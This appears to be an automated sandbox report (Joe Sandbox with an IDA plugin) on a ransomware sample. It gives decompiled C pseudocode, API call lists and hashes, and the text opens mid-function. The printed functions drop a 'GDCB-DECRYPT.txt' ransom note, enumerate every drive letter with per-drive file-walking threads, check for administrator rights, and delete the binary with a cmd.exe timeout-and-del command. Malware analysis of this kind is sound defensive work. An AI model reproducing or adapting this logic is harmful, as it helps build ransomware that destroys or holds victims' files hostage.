                                      								_t36 = _t40;
                                      								do {
                                      									if((_t34 & 0x00000001) != 0) {
                                      										 *((char*)(_t38 + _t34)) = 0;
                                      									} else {
                                      										_t32 =  *_t40;
                                      										_t40 =  &(_t40[1]);
                                      										 *((char*)(_t38 + _t34)) = _t32;
                                      									}
                                      									_t34 = _t34 + 1;
                                      									_t30 = lstrlenA(_t36);
                                      									_t36 = _v8;
                                      								} while (_t34 < _t30 + _t30);
                                      							}
                                      							UnmapViewOfFile(_v12);
                                      							_t33 = _v16;
                                      							_t39 = _v20;
                                      						}
                                      						CloseHandle(_v24);
                                      					}
                                      					CloseHandle(_t33);
                                      				}
                                      				return VirtualFree(_t39, 0, 0x8000);
                                      			}




















                                      0x00405287
                                      0x0040528f
                                      0x00405299
                                      0x0040529c
                                      0x004052bb
                                      0x004052bd
                                      0x004052c3
                                      0x004052d4
                                      0x004052da
                                      0x004052df
                                      0x004052ea
                                      0x004052f0
                                      0x004052f5
                                      0x004052f7
                                      0x004052f7
                                      0x004052fb
                                      0x004052fe
                                      0x00405305
                                      0x00405307
                                      0x00405312
                                      0x00405314
                                      0x00405316
                                      0x00405319
                                      0x00405323
                                      0x0040531b
                                      0x0040531b
                                      0x0040531d
                                      0x0040531e
                                      0x0040531e
                                      0x00405328
                                      0x00405329
                                      0x0040532f
                                      0x00405334
                                      0x00405316
                                      0x0040533b
                                      0x00405341
                                      0x00405344
                                      0x00405344
                                      0x0040534a
                                      0x0040534a
                                      0x00405351
                                      0x00405351
                                      0x0040536b

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,00405482), ref: 00405289
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00405482), ref: 0040529C
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00405482), ref: 004052B5
                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052D4
                                      • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052EA
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00405482), ref: 004052FE
                                      • lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 0040530A
                                      • lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 00405329
                                      • UnmapViewOfFile.KERNEL32(?,?,?,?,?,00405482), ref: 0040533B
                                      • CloseHandle.KERNEL32(?,?,?,?,?,00405482), ref: 0040534A
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00405482), ref: 00405351
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00405482), ref: 0040535F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                      • String ID:
                                      • API String ID: 869890170-0
                                      • Opcode ID: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
                                      • Instruction ID: 2f98b26bd8e2ee7d85d2e29faddfdf40e9a873387be652c4beaa2a3b1dd5d715
                                      • Opcode Fuzzy Hash: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
                                      • Instruction Fuzzy Hash: 4231A531740715BBEB205B649D4EF5E7B68EB05B40F200075FB41BA2D2C6F5A9018FAC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406640(void* __ecx) {
                                      				long _v8;
                                      				WCHAR* _t7;
                                      				signed int _t16;
                                      				void* _t21;
                                      				void* _t22;
                                      				void* _t25;
                                      
                                      				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
                                      				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
                                      				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
                                      				if(_t22 != 0xffffffff) {
                                      					_t7 =  *0x412b04; // 0x412000
                                      					if(_t7 != 0) {
                                      						WriteFile(_t22,  *0x412b04, lstrlenW(_t7) + _t11,  &_v8, 0);
                                      					}
                                      					CloseHandle(_t22);
                                      					_t16 = 1;
                                      				} else {
                                      					_t16 = 0 | GetLastError() == 0x000000b7;
                                      				}
                                      				VirtualFree(_t25, 0, 0x8000);
                                      				return _t16;
                                      			}









                                      0x0040665b
                                      0x00406663
                                      0x00406685
                                      0x0040668a
                                      0x0040669e
                                      0x004066a5
                                      0x004066be
                                      0x004066be
                                      0x004066c5
                                      0x004066cb
                                      0x0040668c
                                      0x00406699
                                      0x00406699
                                      0x004066d8
                                      0x004066e6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
                                      • wsprintfW.USER32 ref: 00406663
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
                                      • GetLastError.KERNEL32(?,?), ref: 0040668C
                                      • lstrlenW.KERNEL32(00412000,?,00000000,?,?), ref: 004066AE
                                      • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 004066BE
                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 004066C5
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                      • String ID: %s\GDCB-DECRYPT.txt
                                      • API String ID: 2985722263-4054134092
                                      • Opcode ID: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
                                      • Instruction ID: 9b1f1ee7684b205ce34ce946b48542e85b02e5c2206a3fbb18e6830c08f85e02
                                      • Opcode Fuzzy Hash: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
                                      • Instruction Fuzzy Hash: 2D0171753802107BF7205B64AE4EFAA3A6CEB49B15F100135FB05F91E1DBF96C11866D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404FD0() {
                                      				WCHAR* _t6;
                                      				short* _t8;
                                      
                                      				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				if(_t6 != 0) {
                                      					GetModuleFileNameW(0, _t6, 0x200);
                                      					if(_t8 != 0) {
                                      						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                      						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                      					}
                                      				}
                                      				ExitProcess(0);
                                      			}





                                      0x00404ff6
                                      0x00404ffa
                                      0x00404ffe
                                      0x00405008
                                      0x00405010
                                      0x00405019
                                      0x00405033
                                      0x00405033
                                      0x00405010
                                      0x0040503b

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
                                      • wsprintfW.USER32 ref: 00405019
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
                                      • ExitProcess.KERNEL32 ref: 0040503B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                      • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                      • API String ID: 4033023619-516011104
                                      • Opcode ID: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
                                      • Instruction ID: 72ce1eeed403cc9d60347bc981b2010fd1fdc34af71b64a0c2a2ed5fbb2db01d
                                      • Opcode Fuzzy Hash: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
                                      • Instruction Fuzzy Hash: E2F0C971BC572277F2351B655D0FF4B2D689B85F56F250036BB087E2D28AF468008AED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403200(void* __ecx, char _a4, intOrPtr _a8) {
                                      				char _t5;
                                      				char _t6;
                                      				intOrPtr _t8;
                                      				int _t10;
                                      				CHAR* _t13;
                                      				int _t15;
                                      				void* _t18;
                                      				CHAR* _t21;
                                      				CHAR* _t23;
                                      
                                      				_t1 =  &_a4; // 0x405135
                                      				_t23 =  *_t1;
                                      				_t18 = __ecx;
                                      				_t5 =  *_t23;
                                      				if(_t5 == 0) {
                                      					L4:
                                      					_t6 =  *_t23;
                                      					if(_t6 == 0x7d) {
                                      						goto L10;
                                      					} else {
                                      						_t21 = _t23;
                                      						if(_t6 != 0) {
                                      							while( *_t21 != 0x7d) {
                                      								_t21 =  &(_t21[1]);
                                      								if( *_t21 != 0) {
                                      									continue;
                                      								} else {
                                      								}
                                      								goto L12;
                                      							}
                                      							 *_t21 = 0;
                                      						}
                                      						L12:
                                      						_t8 = _a8;
                                      						if(_t8 != 1) {
                                      							if(_t8 == 2) {
                                      								_t10 = lstrlenA(_t23);
                                      								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                      								 *(_t18 + 8) = _t13;
                                      								goto L16;
                                      							}
                                      						} else {
                                      							_t15 = lstrlenA(_t23);
                                      							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                      							 *(_t18 + 4) = _t13;
                                      							L16:
                                      							if(_t13 != 0) {
                                      								lstrcpyA(_t13, _t23);
                                      							}
                                      						}
                                      						 *_t21 = 0x7d;
                                      						return 1;
                                      					}
                                      				} else {
                                      					while(_t5 != 0x7d) {
                                      						_t23 =  &(_t23[1]);
                                      						if(_t5 == 0x3d) {
                                      							goto L4;
                                      						} else {
                                      							_t5 =  *_t23;
                                      							if(_t5 != 0) {
                                      								continue;
                                      							} else {
                                      								goto L4;
                                      							}
                                      						}
                                      						goto L19;
                                      					}
                                      					L10:
                                      					return 0;
                                      				}
                                      				L19:
                                      			}












                                      0x00403205
                                      0x00403205
                                      0x00403208
                                      0x0040320a
                                      0x0040320e
                                      0x0040321f
                                      0x0040321f
                                      0x00403223
                                      0x00000000
                                      0x00403225
                                      0x00403226
                                      0x0040322a
                                      0x00403230
                                      0x00403235
                                      0x00403239
                                      0x00000000
                                      0x00000000
                                      0x0040323b
                                      0x00000000
                                      0x00403239
                                      0x00403245
                                      0x00403245
                                      0x00403248
                                      0x00403248
                                      0x0040324e
                                      0x00403270
                                      0x00403273
                                      0x00403284
                                      0x0040328a
                                      0x00000000
                                      0x0040328a
                                      0x00403250
                                      0x00403251
                                      0x00403262
                                      0x00403268
                                      0x0040328d
                                      0x0040328f
                                      0x00403293
                                      0x00403293
                                      0x0040328f
                                      0x00403299
                                      0x004032a5
                                      0x004032a5
                                      0x00403210
                                      0x00403210
                                      0x00403214
                                      0x00403217
                                      0x00000000
                                      0x00403219
                                      0x00403219
                                      0x0040321d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040321d
                                      0x00000000
                                      0x00403217
                                      0x0040323e
                                      0x00403242
                                      0x00403242
                                      0x00000000

                                      APIs
                                      • lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403251
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040325B
                                      • HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403262
                                      • lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403273
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040327D
                                      • HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403284
                                      • lstrcpyA.KERNEL32(00000000,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403293
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                      • String ID: 5Q@$5Q@
                                      • API String ID: 511007297-547021831
                                      • Opcode ID: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
                                      • Instruction ID: bda05b356578e7771a31f68481e16acc2b94da25dd7eb2ac23c0ab8e8a28fe1a
                                      • Opcode Fuzzy Hash: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
                                      • Instruction Fuzzy Hash: 9A119330504295AAEB211F68990C767BF5CAF12352F2440BFE8C5FB391C7398D4687A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00403DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
                                      				char _v612;
                                      				char _v644;
                                      				void* _v908;
                                      				void* _v912;
                                      				intOrPtr _v916;
                                      				intOrPtr _v920;
                                      				short _v924;
                                      				signed int _v928;
                                      				intOrPtr _v932;
                                      				void* _v936;
                                      				intOrPtr _v940;
                                      				intOrPtr _v944;
                                      				intOrPtr _v948;
                                      				long _v952;
                                      				struct _SECURITY_ATTRIBUTES* _v956;
                                      				struct _SECURITY_ATTRIBUTES* _v960;
                                      				struct _SECURITY_ATTRIBUTES* _v964;
                                      				char _v968;
                                      				void* _t67;
                                      				short _t68;
                                      				intOrPtr _t69;
                                      				int _t72;
                                      				long _t75;
                                      				signed int _t77;
                                      				signed int _t80;
                                      				intOrPtr* _t82;
                                      				void* _t84;
                                      				struct _SECURITY_ATTRIBUTES* _t87;
                                      				long _t88;
                                      				intOrPtr _t89;
                                      				intOrPtr _t92;
                                      				intOrPtr _t95;
                                      				char _t101;
                                      				intOrPtr _t106;
                                      				void _t110;
                                      				struct _SECURITY_ATTRIBUTES** _t114;
                                      				intOrPtr _t115;
                                      				signed int _t119;
                                      				void* _t121;
                                      
                                      				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                      				_t87 = __ecx;
                                      				_v964 = __ecx;
                                      				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                      				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                      				_t88 = 0;
                                      				 *_t67 = 0x43;
                                      				_t68 =  *L"?:\\"; // 0x3a003f
                                      				_v924 = _t68;
                                      				_t69 =  *0x40e308; // 0x5c
                                      				_v920 = _t69;
                                      				_v968 = GetTickCount();
                                      				_t114 =  &_v644;
                                      				_t110 = 0x41;
                                      				do {
                                      					_v924 = _t110;
                                      					_t72 = GetDriveTypeW( &_v924);
                                      					if(_t72 >= 2 && _t72 != 5) {
                                      						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                      						_t84 = _t114 - 8;
                                      						 *_t84 = _t110;
                                      						 *_t114 = 0;
                                      						_t114[2] = 0;
                                      						_t114[3] = 0;
                                      						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00406840, _t84, 0, 0);
                                      						_t88 = _t88 + 1;
                                      						_t114 =  &(_t114[6]);
                                      					}
                                      					_t110 = _t110 + 1;
                                      				} while (_t110 <= 0x5a);
                                      				_v952 = _t88;
                                      				asm("xorps xmm0, xmm0");
                                      				_v956 = 0;
                                      				_v960 = 0;
                                      				asm("movlpd [esp+0x38], xmm0");
                                      				asm("movlpd [esp+0x30], xmm0");
                                      				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                      				_t75 = GetTickCount();
                                      				asm("xorps xmm0, xmm0");
                                      				_t115 = _v948;
                                      				_v932 = _t75 - _v968;
                                      				_t77 = 0;
                                      				_v964 = 0;
                                      				asm("movlpd [esp+0x40], xmm0");
                                      				if(_t88 < 2) {
                                      					_t95 = _v940;
                                      					_t106 = _v944;
                                      				} else {
                                      					_t26 = _t88 - 2; // -1
                                      					_t92 = _v940;
                                      					_t82 =  &_v612;
                                      					_t101 = (_t26 >> 1) + 1;
                                      					_v968 = _t101;
                                      					_v928 = _t101 + _t101;
                                      					_t106 = _v944;
                                      					do {
                                      						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                      						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                      						asm("adc edi, [eax-0x14]");
                                      						_t115 = _t115 +  *_t82;
                                      						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                      						asm("adc edx, [eax+0x4]");
                                      						_t82 = _t82 + 0x30;
                                      						_t41 =  &_v968;
                                      						 *_t41 = _v968 - 1;
                                      					} while ( *_t41 != 0);
                                      					_t77 = _v928;
                                      					_v968 = _t92;
                                      					_t88 = _v952;
                                      					_t95 = _v968;
                                      				}
                                      				if(_t77 >= _t88) {
                                      					_t89 = _v916;
                                      				} else {
                                      					_t80 = _t77 + _t77 * 2;
                                      					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                      					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                      				}
                                      				asm("adc edx, edi");
                                      				asm("adc edx, eax");
                                      				return E00405540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                      			}










































                                      0x00403de6
                                      0x00403df8
                                      0x00403dfc
                                      0x00403e00
                                      0x00403e0b
                                      0x00403e0e
                                      0x00403e10
                                      0x00403e13
                                      0x00403e18
                                      0x00403e1c
                                      0x00403e21
                                      0x00403e2b
                                      0x00403e2f
                                      0x00403e36
                                      0x00403e40
                                      0x00403e44
                                      0x00403e4a
                                      0x00403e53
                                      0x00403e62
                                      0x00403e65
                                      0x00403e72
                                      0x00403e75
                                      0x00403e7b
                                      0x00403e82
                                      0x00403e8f
                                      0x00403e93
                                      0x00403e94
                                      0x00403e94
                                      0x00403e97
                                      0x00403e98
                                      0x00403ea6
                                      0x00403eaa
                                      0x00403ead
                                      0x00403eb7
                                      0x00403ebf
                                      0x00403ec5
                                      0x00403ecb
                                      0x00403ed1
                                      0x00403edb
                                      0x00403ee2
                                      0x00403ee6
                                      0x00403eea
                                      0x00403eec
                                      0x00403ef4
                                      0x00403efd
                                      0x00403f5c
                                      0x00403f60
                                      0x00403eff
                                      0x00403eff
                                      0x00403f02
                                      0x00403f08
                                      0x00403f0f
                                      0x00403f10
                                      0x00403f17
                                      0x00403f1b
                                      0x00403f20
                                      0x00403f27
                                      0x00403f2a
                                      0x00403f2e
                                      0x00403f38
                                      0x00403f3a
                                      0x00403f3e
                                      0x00403f41
                                      0x00403f44
                                      0x00403f44
                                      0x00403f44
                                      0x00403f4a
                                      0x00403f4e
                                      0x00403f52
                                      0x00403f56
                                      0x00403f56
                                      0x00403f66
                                      0x00403f8a
                                      0x00403f68
                                      0x00403f68
                                      0x00403f72
                                      0x00403f76
                                      0x00403f7d
                                      0x00403f94
                                      0x00403f98
                                      0x00403fb6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00403E00
                                      • GetTickCount.KERNEL32 ref: 00403E25
                                      • GetDriveTypeW.KERNEL32(?), ref: 00403E4A
                                      • CreateThread.KERNEL32 ref: 00403E89
                                      • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00403ECB
                                      • GetTickCount.KERNEL32 ref: 00403ED1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                      • String ID: ?:\
                                      • API String ID: 458387131-2533537817
                                      • Opcode ID: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
                                      • Instruction ID: a427c5faede150c50d802e976730206525a879d89cb9664245e235534ffcdea3
                                      • Opcode Fuzzy Hash: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
                                      • Instruction Fuzzy Hash: FF5136719083019FC310CF14C988B5BBBE5FF88315F504A2EFA89A73A1D375A944CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406840(void* _a4) {
                                      				intOrPtr _v0;
                                      				intOrPtr _v4;
                                      				long _v8;
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				struct _CRITICAL_SECTION _v40;
                                      				WCHAR* _t12;
                                      				void* _t22;
                                      
                                      				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                      				_t22 = _a4;
                                      				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                      				InitializeCriticalSection( &_v40);
                                      				_v12 = 0x2710;
                                      				_v8 = 0;
                                      				_v4 = 0xffffffff;
                                      				_v0 = 0xffffffff;
                                      				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                      				E004066F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                      				VirtualFree(_t22, 0, 0x8000);
                                      				ExitThread(0);
                                      			}











                                      0x00406859
                                      0x0040685f
                                      0x0040686e
                                      0x0040687c
                                      0x00406890
                                      0x00406898
                                      0x004068a0
                                      0x004068a8
                                      0x004068b6
                                      0x004068cb
                                      0x004068db
                                      0x004068e3

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00406859
                                      • wsprintfW.USER32 ref: 0040686E
                                      • InitializeCriticalSection.KERNEL32(?), ref: 0040687C
                                      • VirtualAlloc.KERNEL32 ref: 004068B0
                                        • Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                        • Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                        • Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 004068DB
                                      • ExitThread.KERNEL32 ref: 004068E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                      • String ID: %c:\
                                      • API String ID: 1988002015-3142399695
                                      • Opcode ID: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
                                      • Instruction ID: d88b45d10d8f236cef520cbec221070cd426d639c7b6d1ffd4d7ad39dfd3f75c
                                      • Opcode Fuzzy Hash: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
                                      • Instruction Fuzzy Hash: 800196B5244300BFE7109F50CD8EF577BA8AB84B14F004628FB65AD1E2D7B09904CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 65%
                                      			E00403A60() {
                                      				signed int _v8;
                                      				void* _v12;
                                      				short _v16;
                                      				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                      				int _t13;
                                      				_Unknown_base(*)()* _t15;
                                      				signed int _t16;
                                      
                                      				_v20.Value = 0;
                                      				_v16 = 0x500;
                                      				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                      				if(_t13 != 0) {
                                      					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                      					_t5 =  &_v8; // 0x404a63
                                      					_t16 =  *_t15(0, _v12, _t5);
                                      					asm("sbb eax, eax");
                                      					_v8 = _v8 &  ~_t16;
                                      					FreeSid(_v12);
                                      					_t10 =  &_v8; // 0x404a63
                                      					return  *_t10;
                                      				} else {
                                      					return _t13;
                                      				}
                                      			}










                                      0x00403a69
                                      0x00403a89
                                      0x00403a90
                                      0x00403a98
                                      0x00403aaf
                                      0x00403ab5
                                      0x00403abe
                                      0x00403ac5
                                      0x00403ac7
                                      0x00403aca
                                      0x00403ad0
                                      0x00403ad6
                                      0x00403a9d
                                      0x00403a9d
                                      0x00403a9d

                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00403AA3
                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00403AAF
                                      • FreeSid.ADVAPI32(?), ref: 00403ACA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
